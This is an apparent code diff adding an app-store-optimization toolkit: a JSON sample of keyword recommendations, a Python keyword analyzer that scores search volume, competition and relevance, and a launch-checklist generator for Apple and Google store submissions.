|
||||
"strategy": "keyword_rich"
|
||||
}
|
||||
],
|
||||
"short_description_recommendation": "AI task manager - Organize, prioritize, and collaborate with your team",
|
||||
"description_focus": "Keywords naturally integrated throughout 4000 character description"
|
||||
}
|
||||
},
|
||||
"strategic_recommendations": [
|
||||
"Focus on 'AI prioritization' as unique differentiator - low competition, high relevance",
|
||||
"Target 'team task manager' and 'team productivity' keywords - good search volume, lower competition than generic terms",
|
||||
"Include long-tail keywords in description for additional discovery opportunities",
|
||||
"Test title variations with A/B testing after launch",
|
||||
"Monitor competitor keyword changes quarterly"
|
||||
],
|
||||
"priority_actions": [
|
||||
{
|
||||
"action": "Optimize app title with primary keyword",
|
||||
"priority": "high",
|
||||
"expected_impact": "15-25% improvement in search visibility"
|
||||
},
|
||||
{
|
||||
"action": "Create description highlighting AI features with natural keyword integration",
|
||||
"priority": "high",
|
||||
"expected_impact": "10-15% improvement in conversion rate"
|
||||
},
|
||||
{
|
||||
"action": "Plan A/B tests for icon and screenshots post-launch",
|
||||
"priority": "medium",
|
||||
"expected_impact": "5-10% improvement in conversion rate"
|
||||
}
|
||||
],
|
||||
"aso_health_estimate": {
|
||||
"current_score": "N/A (pre-launch)",
|
||||
"potential_score_with_optimizations": "75-80/100",
|
||||
"key_strengths": [
|
||||
"Unique AI differentiation",
|
||||
"Clear target audience",
|
||||
"Strong feature set"
|
||||
],
|
||||
"areas_to_develop": [
|
||||
"Build rating volume post-launch",
|
||||
"Monitor and respond to reviews",
|
||||
"Continuous keyword optimization"
|
||||
]
|
||||
}
|
||||
}
|
||||
406
packages/llm/skills/app-store-optimization/keyword_analyzer.py
Normal file
406
packages/llm/skills/app-store-optimization/keyword_analyzer.py
Normal file
@ -0,0 +1,406 @@
|
||||
"""
|
||||
Keyword analysis module for App Store Optimization.
|
||||
Analyzes keyword search volume, competition, and relevance for app discovery.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional, Tuple
|
||||
import re
|
||||
from collections import Counter
|
||||
|
||||
|
||||
class KeywordAnalyzer:
|
||||
"""Analyzes keywords for ASO effectiveness."""
|
||||
|
||||
# Competition level thresholds (based on number of competing apps)
|
||||
COMPETITION_THRESHOLDS = {
|
||||
'low': 1000,
|
||||
'medium': 5000,
|
||||
'high': 10000
|
||||
}
|
||||
|
||||
# Search volume categories (monthly searches estimate)
|
||||
VOLUME_CATEGORIES = {
|
||||
'very_low': 1000,
|
||||
'low': 5000,
|
||||
'medium': 20000,
|
||||
'high': 100000,
|
||||
'very_high': 500000
|
||||
}
|
||||
|
||||
def __init__(self):
|
||||
"""Initialize keyword analyzer."""
|
||||
self.analyzed_keywords = {}
|
||||
|
||||
def analyze_keyword(
|
||||
self,
|
||||
keyword: str,
|
||||
search_volume: int = 0,
|
||||
competing_apps: int = 0,
|
||||
relevance_score: float = 0.0
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Analyze a single keyword for ASO potential.
|
||||
|
||||
Args:
|
||||
keyword: The keyword to analyze
|
||||
search_volume: Estimated monthly search volume
|
||||
competing_apps: Number of apps competing for this keyword
|
||||
relevance_score: Relevance to your app (0.0-1.0)
|
||||
|
||||
Returns:
|
||||
Dictionary with keyword analysis
|
||||
"""
|
||||
competition_level = self._calculate_competition_level(competing_apps)
|
||||
volume_category = self._categorize_search_volume(search_volume)
|
||||
difficulty_score = self._calculate_keyword_difficulty(
|
||||
search_volume,
|
||||
competing_apps
|
||||
)
|
||||
|
||||
# Calculate potential score (0-100)
|
||||
potential_score = self._calculate_potential_score(
|
||||
search_volume,
|
||||
competing_apps,
|
||||
relevance_score
|
||||
)
|
||||
|
||||
analysis = {
|
||||
'keyword': keyword,
|
||||
'search_volume': search_volume,
|
||||
'volume_category': volume_category,
|
||||
'competing_apps': competing_apps,
|
||||
'competition_level': competition_level,
|
||||
'relevance_score': relevance_score,
|
||||
'difficulty_score': difficulty_score,
|
||||
'potential_score': potential_score,
|
||||
'recommendation': self._generate_recommendation(
|
||||
potential_score,
|
||||
difficulty_score,
|
||||
relevance_score
|
||||
),
|
||||
'keyword_length': len(keyword.split()),
|
||||
'is_long_tail': len(keyword.split()) >= 3
|
||||
}
|
||||
|
||||
self.analyzed_keywords[keyword] = analysis
|
||||
return analysis
|
||||
|
||||
def compare_keywords(self, keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""
|
||||
Compare multiple keywords and rank by potential.
|
||||
|
||||
Args:
|
||||
keywords_data: List of dicts with keyword, search_volume, competing_apps, relevance_score
|
||||
|
||||
Returns:
|
||||
Comparison report with ranked keywords
|
||||
"""
|
||||
analyses = []
|
||||
for kw_data in keywords_data:
|
||||
analysis = self.analyze_keyword(
|
||||
keyword=kw_data['keyword'],
|
||||
search_volume=kw_data.get('search_volume', 0),
|
||||
competing_apps=kw_data.get('competing_apps', 0),
|
||||
relevance_score=kw_data.get('relevance_score', 0.0)
|
||||
)
|
||||
analyses.append(analysis)
|
||||
|
||||
# Sort by potential score (descending)
|
||||
ranked_keywords = sorted(
|
||||
analyses,
|
||||
key=lambda x: x['potential_score'],
|
||||
reverse=True
|
||||
)
|
||||
|
||||
# Categorize keywords
|
||||
primary_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if kw['potential_score'] >= 70 and kw['relevance_score'] >= 0.8
|
||||
]
|
||||
|
||||
secondary_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if 50 <= kw['potential_score'] < 70 and kw['relevance_score'] >= 0.6
|
||||
]
|
||||
|
||||
long_tail_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if kw['is_long_tail'] and kw['relevance_score'] >= 0.7
|
||||
]
|
||||
|
||||
return {
|
||||
'total_keywords_analyzed': len(analyses),
|
||||
'ranked_keywords': ranked_keywords,
|
||||
'primary_keywords': primary_keywords[:5], # Top 5
|
||||
'secondary_keywords': secondary_keywords[:10], # Top 10
|
||||
'long_tail_keywords': long_tail_keywords[:10], # Top 10
|
||||
'summary': self._generate_comparison_summary(
|
||||
primary_keywords,
|
||||
secondary_keywords,
|
||||
long_tail_keywords
|
||||
)
|
||||
}
|
||||
|
||||
def find_long_tail_opportunities(
|
||||
self,
|
||||
base_keyword: str,
|
||||
modifiers: List[str]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
Generate long-tail keyword variations.
|
||||
|
||||
Args:
|
||||
base_keyword: Core keyword (e.g., "task manager")
|
||||
modifiers: List of modifiers (e.g., ["free", "simple", "team"])
|
||||
|
||||
Returns:
|
||||
List of long-tail keyword suggestions
|
||||
"""
|
||||
long_tail_keywords = []
|
||||
|
||||
# Generate combinations
|
||||
for modifier in modifiers:
|
||||
# Modifier + base
|
||||
variation1 = f"{modifier} {base_keyword}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': variation1,
|
||||
'pattern': 'modifier_base',
|
||||
'estimated_competition': 'low',
|
||||
'rationale': f"Less competitive variation of '{base_keyword}'"
|
||||
})
|
||||
|
||||
# Base + modifier
|
||||
variation2 = f"{base_keyword} {modifier}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': variation2,
|
||||
'pattern': 'base_modifier',
|
||||
'estimated_competition': 'low',
|
||||
'rationale': f"Specific use-case variation of '{base_keyword}'"
|
||||
})
|
||||
|
||||
# Add question-based long-tail
|
||||
question_words = ['how', 'what', 'best', 'top']
|
||||
for q_word in question_words:
|
||||
question_keyword = f"{q_word} {base_keyword}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': question_keyword,
|
||||
'pattern': 'question_based',
|
||||
'estimated_competition': 'very_low',
|
||||
'rationale': f"Informational search query"
|
||||
})
|
||||
|
||||
return long_tail_keywords
|
||||
|
||||
def extract_keywords_from_text(
|
||||
self,
|
||||
text: str,
|
||||
min_word_length: int = 3
|
||||
) -> List[Tuple[str, int]]:
|
||||
"""
|
||||
Extract potential keywords from text (descriptions, reviews).
|
||||
|
||||
Args:
|
||||
text: Text to analyze
|
||||
min_word_length: Minimum word length to consider
|
||||
|
||||
Returns:
|
||||
List of (keyword, frequency) tuples
|
||||
"""
|
||||
# Clean and normalize text
|
||||
text = text.lower()
|
||||
text = re.sub(r'[^\w\s]', ' ', text)
|
||||
|
||||
# Extract words
|
||||
words = text.split()
|
||||
|
||||
# Filter by length
|
||||
words = [w for w in words if len(w) >= min_word_length]
|
||||
|
||||
# Remove common stop words
|
||||
stop_words = {
|
||||
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||
'but', 'not', 'you', 'all', 'can', 'are', 'was', 'were', 'been'
|
||||
}
|
||||
words = [w for w in words if w not in stop_words]
|
||||
|
||||
# Count frequency
|
||||
word_counts = Counter(words)
|
||||
|
||||
# Extract 2-word phrases
|
||||
phrases = []
|
||||
for i in range(len(words) - 1):
|
||||
phrase = f"{words[i]} {words[i+1]}"
|
||||
phrases.append(phrase)
|
||||
|
||||
phrase_counts = Counter(phrases)
|
||||
|
||||
# Combine and sort
|
||||
all_keywords = list(word_counts.items()) + list(phrase_counts.items())
|
||||
all_keywords.sort(key=lambda x: x[1], reverse=True)
|
||||
|
||||
return all_keywords[:50] # Top 50
|
||||
|
||||
def calculate_keyword_density(
|
||||
self,
|
||||
text: str,
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, float]:
|
||||
"""
|
||||
Calculate keyword density in text.
|
||||
|
||||
Args:
|
||||
text: Text to analyze (title, description)
|
||||
target_keywords: Keywords to check density for
|
||||
|
||||
Returns:
|
||||
Dictionary of keyword: density (percentage)
|
||||
"""
|
||||
text_lower = text.lower()
|
||||
total_words = len(text_lower.split())
|
||||
|
||||
densities = {}
|
||||
for keyword in target_keywords:
|
||||
keyword_lower = keyword.lower()
|
||||
occurrences = text_lower.count(keyword_lower)
|
||||
density = (occurrences / total_words) * 100 if total_words > 0 else 0
|
||||
densities[keyword] = round(density, 2)
|
||||
|
||||
return densities
|
||||
|
||||
def _calculate_competition_level(self, competing_apps: int) -> str:
|
||||
"""Determine competition level based on number of competing apps."""
|
||||
if competing_apps < self.COMPETITION_THRESHOLDS['low']:
|
||||
return 'low'
|
||||
elif competing_apps < self.COMPETITION_THRESHOLDS['medium']:
|
||||
return 'medium'
|
||||
elif competing_apps < self.COMPETITION_THRESHOLDS['high']:
|
||||
return 'high'
|
||||
else:
|
||||
return 'very_high'
|
||||
|
||||
def _categorize_search_volume(self, search_volume: int) -> str:
|
||||
"""Categorize search volume."""
|
||||
if search_volume < self.VOLUME_CATEGORIES['very_low']:
|
||||
return 'very_low'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['low']:
|
||||
return 'low'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['medium']:
|
||||
return 'medium'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['high']:
|
||||
return 'high'
|
||||
else:
|
||||
return 'very_high'
|
||||
|
||||
def _calculate_keyword_difficulty(
|
||||
self,
|
||||
search_volume: int,
|
||||
competing_apps: int
|
||||
) -> float:
|
||||
"""
|
||||
Calculate keyword difficulty score (0-100).
|
||||
Higher score = harder to rank.
|
||||
"""
|
||||
if competing_apps == 0:
|
||||
return 0.0
|
||||
|
||||
# Competition factor (0-1)
|
||||
competition_factor = min(competing_apps / 50000, 1.0)
|
||||
|
||||
# Volume factor (0-1) - higher volume = more difficulty
|
||||
volume_factor = min(search_volume / 1000000, 1.0)
|
||||
|
||||
# Difficulty score (weighted average)
|
||||
difficulty = (competition_factor * 0.7 + volume_factor * 0.3) * 100
|
||||
|
||||
return round(difficulty, 1)
|
||||
|
||||
def _calculate_potential_score(
|
||||
self,
|
||||
search_volume: int,
|
||||
competing_apps: int,
|
||||
relevance_score: float
|
||||
) -> float:
|
||||
"""
|
||||
Calculate overall keyword potential (0-100).
|
||||
Higher score = better opportunity.
|
||||
"""
|
||||
# Volume score (0-40 points)
|
||||
volume_score = min((search_volume / 100000) * 40, 40)
|
||||
|
||||
# Competition score (0-30 points) - inverse relationship
|
||||
if competing_apps > 0:
|
||||
competition_score = max(30 - (competing_apps / 500), 0)
|
||||
else:
|
||||
competition_score = 30
|
||||
|
||||
# Relevance score (0-30 points)
|
||||
relevance_points = relevance_score * 30
|
||||
|
||||
total_score = volume_score + competition_score + relevance_points
|
||||
|
||||
return round(min(total_score, 100), 1)
|
||||
|
||||
def _generate_recommendation(
|
||||
self,
|
||||
potential_score: float,
|
||||
difficulty_score: float,
|
||||
relevance_score: float
|
||||
) -> str:
|
||||
"""Generate actionable recommendation for keyword."""
|
||||
if relevance_score < 0.5:
|
||||
return "Low relevance - avoid targeting"
|
||||
|
||||
if potential_score >= 70:
|
||||
return "High priority - target immediately"
|
||||
elif potential_score >= 50:
|
||||
if difficulty_score < 50:
|
||||
return "Good opportunity - include in metadata"
|
||||
else:
|
||||
return "Competitive - use in description, not title"
|
||||
elif potential_score >= 30:
|
||||
return "Secondary keyword - use for long-tail variations"
|
||||
else:
|
||||
return "Low potential - deprioritize"
|
||||
|
||||
def _generate_comparison_summary(
|
||||
self,
|
||||
primary_keywords: List[Dict[str, Any]],
|
||||
secondary_keywords: List[Dict[str, Any]],
|
||||
long_tail_keywords: List[Dict[str, Any]]
|
||||
) -> str:
|
||||
"""Generate summary of keyword comparison."""
|
||||
summary_parts = []
|
||||
|
||||
summary_parts.append(
|
||||
f"Identified {len(primary_keywords)} high-priority primary keywords."
|
||||
)
|
||||
|
||||
if primary_keywords:
|
||||
top_keyword = primary_keywords[0]['keyword']
|
||||
summary_parts.append(
|
||||
f"Top recommendation: '{top_keyword}' (potential score: {primary_keywords[0]['potential_score']})."
|
||||
)
|
||||
|
||||
summary_parts.append(
|
||||
f"Found {len(secondary_keywords)} secondary keywords for description and metadata."
|
||||
)
|
||||
|
||||
summary_parts.append(
|
||||
f"Discovered {len(long_tail_keywords)} long-tail opportunities with lower competition."
|
||||
)
|
||||
|
||||
return " ".join(summary_parts)
|
||||
|
||||
|
||||
def analyze_keyword_set(keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to analyze a set of keywords.
|
||||
|
||||
Args:
|
||||
keywords_data: List of keyword data dictionaries
|
||||
|
||||
Returns:
|
||||
Complete analysis report
|
||||
"""
|
||||
analyzer = KeywordAnalyzer()
|
||||
return analyzer.compare_keywords(keywords_data)
|
||||
739
packages/llm/skills/app-store-optimization/launch_checklist.py
Normal file
739
packages/llm/skills/app-store-optimization/launch_checklist.py
Normal file
@ -0,0 +1,739 @@
|
||||
"""
|
||||
Launch checklist module for App Store Optimization.
|
||||
Generates comprehensive pre-launch and update checklists.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
|
||||
class LaunchChecklistGenerator:
|
||||
"""Generates comprehensive checklists for app launches and updates."""
|
||||
|
||||
def __init__(self, platform: str = 'both'):
|
||||
"""
|
||||
Initialize checklist generator.
|
||||
|
||||
Args:
|
||||
platform: 'apple', 'google', or 'both'
|
||||
"""
|
||||
if platform not in ['apple', 'google', 'both']:
|
||||
raise ValueError("Platform must be 'apple', 'google', or 'both'")
|
||||
|
||||
self.platform = platform
|
||||
|
||||
def generate_prelaunch_checklist(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
launch_date: Optional[str] = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Generate comprehensive pre-launch checklist.
|
||||
|
||||
Args:
|
||||
app_info: App information (name, category, target_audience)
|
||||
launch_date: Target launch date (YYYY-MM-DD)
|
||||
|
||||
Returns:
|
||||
Complete pre-launch checklist
|
||||
"""
|
||||
checklist = {
|
||||
'app_info': app_info,
|
||||
'launch_date': launch_date,
|
||||
'checklists': {}
|
||||
}
|
||||
|
||||
# Generate platform-specific checklists
|
||||
if self.platform in ['apple', 'both']:
|
||||
checklist['checklists']['apple'] = self._generate_apple_checklist(app_info)
|
||||
|
||||
if self.platform in ['google', 'both']:
|
||||
checklist['checklists']['google'] = self._generate_google_checklist(app_info)
|
||||
|
||||
# Add universal checklist items
|
||||
checklist['checklists']['universal'] = self._generate_universal_checklist(app_info)
|
||||
|
||||
# Generate timeline
|
||||
if launch_date:
|
||||
checklist['timeline'] = self._generate_launch_timeline(launch_date)
|
||||
|
||||
# Calculate completion status
|
||||
checklist['summary'] = self._calculate_checklist_summary(checklist['checklists'])
|
||||
|
||||
return checklist
|
||||
|
||||
def validate_app_store_compliance(
|
||||
self,
|
||||
app_data: Dict[str, Any],
|
||||
platform: str = 'apple'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Validate compliance with app store guidelines.
|
||||
|
||||
Args:
|
||||
app_data: App data including metadata, privacy policy, etc.
|
||||
platform: 'apple' or 'google'
|
||||
|
||||
Returns:
|
||||
Compliance validation report
|
||||
"""
|
||||
validation_results = {
|
||||
'platform': platform,
|
||||
'is_compliant': True,
|
||||
'errors': [],
|
||||
'warnings': [],
|
||||
'recommendations': []
|
||||
}
|
||||
|
||||
if platform == 'apple':
|
||||
self._validate_apple_compliance(app_data, validation_results)
|
||||
elif platform == 'google':
|
||||
self._validate_google_compliance(app_data, validation_results)
|
||||
|
||||
# Determine overall compliance
|
||||
validation_results['is_compliant'] = len(validation_results['errors']) == 0
|
||||
|
||||
return validation_results
|
||||
|
||||
def create_update_plan(
|
||||
self,
|
||||
current_version: str,
|
||||
planned_features: List[str],
|
||||
update_frequency: str = 'monthly'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Create update cadence and feature rollout plan.
|
||||
|
||||
Args:
|
||||
current_version: Current app version
|
||||
planned_features: List of planned features
|
||||
update_frequency: 'weekly', 'biweekly', 'monthly', 'quarterly'
|
||||
|
||||
Returns:
|
||||
Update plan with cadence and feature schedule
|
||||
"""
|
||||
# Calculate next versions
|
||||
next_versions = self._calculate_next_versions(
|
||||
current_version,
|
||||
update_frequency,
|
||||
len(planned_features)
|
||||
)
|
||||
|
||||
# Distribute features across versions
|
||||
feature_schedule = self._distribute_features(
|
||||
planned_features,
|
||||
next_versions
|
||||
)
|
||||
|
||||
# Generate "What's New" templates
|
||||
whats_new_templates = [
|
||||
self._generate_whats_new_template(version_data)
|
||||
for version_data in feature_schedule
|
||||
]
|
||||
|
||||
return {
|
||||
'current_version': current_version,
|
||||
'update_frequency': update_frequency,
|
||||
'planned_updates': len(feature_schedule),
|
||||
'feature_schedule': feature_schedule,
|
||||
'whats_new_templates': whats_new_templates,
|
||||
'recommendations': self._generate_update_recommendations(update_frequency)
|
||||
}
|
||||
|
||||
def optimize_launch_timing(
|
||||
self,
|
||||
app_category: str,
|
||||
target_audience: str,
|
||||
current_date: Optional[str] = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Recommend optimal launch timing.
|
||||
|
||||
Args:
|
||||
app_category: App category
|
||||
target_audience: Target audience description
|
||||
current_date: Current date (YYYY-MM-DD), defaults to today
|
||||
|
||||
Returns:
|
||||
Launch timing recommendations
|
||||
"""
|
||||
if not current_date:
|
||||
current_date = datetime.now().strftime('%Y-%m-%d')
|
||||
|
||||
# Analyze launch timing factors
|
||||
day_of_week_rec = self._recommend_day_of_week(app_category)
|
||||
seasonal_rec = self._recommend_seasonal_timing(app_category, current_date)
|
||||
competitive_rec = self._analyze_competitive_timing(app_category)
|
||||
|
||||
# Calculate optimal dates
|
||||
optimal_dates = self._calculate_optimal_dates(
|
||||
current_date,
|
||||
day_of_week_rec,
|
||||
seasonal_rec
|
||||
)
|
||||
|
||||
return {
|
||||
'current_date': current_date,
|
||||
'optimal_launch_dates': optimal_dates,
|
||||
'day_of_week_recommendation': day_of_week_rec,
|
||||
'seasonal_considerations': seasonal_rec,
|
||||
'competitive_timing': competitive_rec,
|
||||
'final_recommendation': self._generate_timing_recommendation(
|
||||
optimal_dates,
|
||||
seasonal_rec
|
||||
)
|
||||
}
|
||||
|
||||
def plan_seasonal_campaigns(
|
||||
self,
|
||||
app_category: str,
|
||||
current_month: int = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Identify seasonal opportunities for ASO campaigns.
|
||||
|
||||
Args:
|
||||
app_category: App category
|
||||
current_month: Current month (1-12), defaults to current
|
||||
|
||||
Returns:
|
||||
Seasonal campaign opportunities
|
||||
"""
|
||||
if not current_month:
|
||||
current_month = datetime.now().month
|
||||
|
||||
# Identify relevant seasonal events
|
||||
seasonal_opportunities = self._identify_seasonal_opportunities(
|
||||
app_category,
|
||||
current_month
|
||||
)
|
||||
|
||||
# Generate campaign ideas
|
||||
campaigns = [
|
||||
self._generate_seasonal_campaign(opportunity)
|
||||
for opportunity in seasonal_opportunities
|
||||
]
|
||||
|
||||
return {
|
||||
'current_month': current_month,
|
||||
'category': app_category,
|
||||
'seasonal_opportunities': seasonal_opportunities,
|
||||
'campaign_ideas': campaigns,
|
||||
'implementation_timeline': self._create_seasonal_timeline(campaigns)
|
||||
}
|
||||
|
||||
def _generate_apple_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate Apple App Store specific checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'App Store Connect Setup',
|
||||
'items': [
|
||||
{'task': 'App Store Connect account created', 'status': 'pending'},
|
||||
{'task': 'App bundle ID registered', 'status': 'pending'},
|
||||
{'task': 'App Privacy declarations completed', 'status': 'pending'},
|
||||
{'task': 'Age rating questionnaire completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Metadata (Apple)',
|
||||
'items': [
|
||||
{'task': 'App title (30 chars max)', 'status': 'pending'},
|
||||
{'task': 'Subtitle (30 chars max)', 'status': 'pending'},
|
||||
{'task': 'Promotional text (170 chars max)', 'status': 'pending'},
|
||||
{'task': 'Description (4000 chars max)', 'status': 'pending'},
|
||||
{'task': 'Keywords (100 chars, comma-separated)', 'status': 'pending'},
|
||||
{'task': 'Category selection (primary + secondary)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Visual Assets (Apple)',
|
||||
'items': [
|
||||
{'task': 'App icon (1024x1024px)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPhone 6.7" required)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPhone 5.5" required)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPad Pro 12.9" if iPad app)', 'status': 'pending'},
|
||||
{'task': 'App preview video (optional but recommended)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Technical Requirements (Apple)',
|
||||
'items': [
|
||||
{'task': 'Build uploaded to App Store Connect', 'status': 'pending'},
|
||||
{'task': 'TestFlight testing completed', 'status': 'pending'},
|
||||
{'task': 'App tested on required iOS versions', 'status': 'pending'},
|
||||
{'task': 'Crash-free rate > 99%', 'status': 'pending'},
|
||||
{'task': 'All links in app/metadata working', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Legal & Privacy (Apple)',
|
||||
'items': [
|
||||
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||
{'task': 'Terms of Service URL (if applicable)', 'status': 'pending'},
|
||||
{'task': 'Data collection declarations accurate', 'status': 'pending'},
|
||||
{'task': 'Third-party SDKs disclosed', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_google_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate Google Play Store specific checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'Play Console Setup',
|
||||
'items': [
|
||||
{'task': 'Google Play Console account created', 'status': 'pending'},
|
||||
{'task': 'Developer profile completed', 'status': 'pending'},
|
||||
{'task': 'Payment merchant account linked (if paid app)', 'status': 'pending'},
|
||||
{'task': 'Content rating questionnaire completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Metadata (Google)',
|
||||
'items': [
|
||||
{'task': 'App title (50 chars max)', 'status': 'pending'},
|
||||
{'task': 'Short description (80 chars max)', 'status': 'pending'},
|
||||
{'task': 'Full description (4000 chars max)', 'status': 'pending'},
|
||||
{'task': 'Category selection', 'status': 'pending'},
|
||||
{'task': 'Tags (up to 5)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Visual Assets (Google)',
|
||||
'items': [
|
||||
{'task': 'App icon (512x512px)', 'status': 'pending'},
|
||||
{'task': 'Feature graphic (1024x500px)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (2-8 required, phone)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (tablet, if applicable)', 'status': 'pending'},
|
||||
{'task': 'Promo video (YouTube link, optional)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Technical Requirements (Google)',
|
||||
'items': [
|
||||
{'task': 'APK/AAB uploaded to Play Console', 'status': 'pending'},
|
||||
{'task': 'Internal testing completed', 'status': 'pending'},
|
||||
{'task': 'App tested on required Android versions', 'status': 'pending'},
|
||||
{'task': 'Target API level meets requirements', 'status': 'pending'},
|
||||
{'task': 'All permissions justified', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Legal & Privacy (Google)',
|
||||
'items': [
|
||||
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||
{'task': 'Data safety section completed', 'status': 'pending'},
|
||||
{'task': 'Ads disclosure (if applicable)', 'status': 'pending'},
|
||||
{'task': 'In-app purchase disclosure (if applicable)', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_universal_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate universal (both platforms) checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'Pre-Launch Marketing',
|
||||
'items': [
|
||||
{'task': 'Landing page created', 'status': 'pending'},
|
||||
{'task': 'Social media accounts setup', 'status': 'pending'},
|
||||
{'task': 'Press kit prepared', 'status': 'pending'},
|
||||
{'task': 'Beta tester feedback collected', 'status': 'pending'},
|
||||
{'task': 'Launch announcement drafted', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'ASO Preparation',
|
||||
'items': [
|
||||
{'task': 'Keyword research completed', 'status': 'pending'},
|
||||
{'task': 'Competitor analysis done', 'status': 'pending'},
|
||||
{'task': 'A/B test plan created for post-launch', 'status': 'pending'},
|
||||
{'task': 'Analytics tracking configured', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Quality Assurance',
|
||||
'items': [
|
||||
{'task': 'All core features tested', 'status': 'pending'},
|
||||
{'task': 'User flows validated', 'status': 'pending'},
|
||||
{'task': 'Performance testing completed', 'status': 'pending'},
|
||||
{'task': 'Accessibility features tested', 'status': 'pending'},
|
||||
{'task': 'Security audit completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Support Infrastructure',
|
||||
'items': [
|
||||
{'task': 'Support email/system setup', 'status': 'pending'},
|
||||
{'task': 'FAQ page created', 'status': 'pending'},
|
||||
{'task': 'Documentation for users prepared', 'status': 'pending'},
|
||||
{'task': 'Team trained on handling reviews', 'status': 'pending'}
|
||||
]
|
||||
}
|
||||
]
|
||||
|
||||
def _generate_launch_timeline(self, launch_date: str) -> List[Dict[str, Any]]:
|
||||
"""Generate timeline with milestones leading to launch."""
|
||||
launch_dt = datetime.strptime(launch_date, '%Y-%m-%d')
|
||||
|
||||
milestones = [
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=90)).strftime('%Y-%m-%d'),
|
||||
'milestone': '90 days before: Complete keyword research and competitor analysis'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=60)).strftime('%Y-%m-%d'),
|
||||
'milestone': '60 days before: Finalize metadata and visual assets'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=45)).strftime('%Y-%m-%d'),
|
||||
'milestone': '45 days before: Begin beta testing program'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||
'milestone': '30 days before: Submit app for review (Apple typically takes 1-2 days, Google instant)'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=14)).strftime('%Y-%m-%d'),
|
||||
'milestone': '14 days before: Prepare launch marketing materials'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt - timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||
'milestone': '7 days before: Set up analytics and monitoring'
|
||||
},
|
||||
{
|
||||
'date': launch_dt.strftime('%Y-%m-%d'),
|
||||
'milestone': 'Launch Day: Release app and execute marketing plan'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt + timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||
'milestone': '7 days after: Monitor metrics, respond to reviews, address critical issues'
|
||||
},
|
||||
{
|
||||
'date': (launch_dt + timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||
'milestone': '30 days after: Analyze launch metrics, plan first update'
|
||||
}
|
||||
]
|
||||
|
||||
return milestones
|
||||
|
||||
def _calculate_checklist_summary(self, checklists: Dict[str, List[Dict[str, Any]]]) -> Dict[str, Any]:
|
||||
"""Calculate completion summary."""
|
||||
total_items = 0
|
||||
completed_items = 0
|
||||
|
||||
for platform, categories in checklists.items():
|
||||
for category in categories:
|
||||
for item in category['items']:
|
||||
total_items += 1
|
||||
if item['status'] == 'completed':
|
||||
completed_items += 1
|
||||
|
||||
completion_percentage = (completed_items / total_items * 100) if total_items > 0 else 0
|
||||
|
||||
return {
|
||||
'total_items': total_items,
|
||||
'completed_items': completed_items,
|
||||
'pending_items': total_items - completed_items,
|
||||
'completion_percentage': round(completion_percentage, 1),
|
||||
'is_ready_to_launch': completion_percentage == 100
|
||||
}
|
||||
|
||||
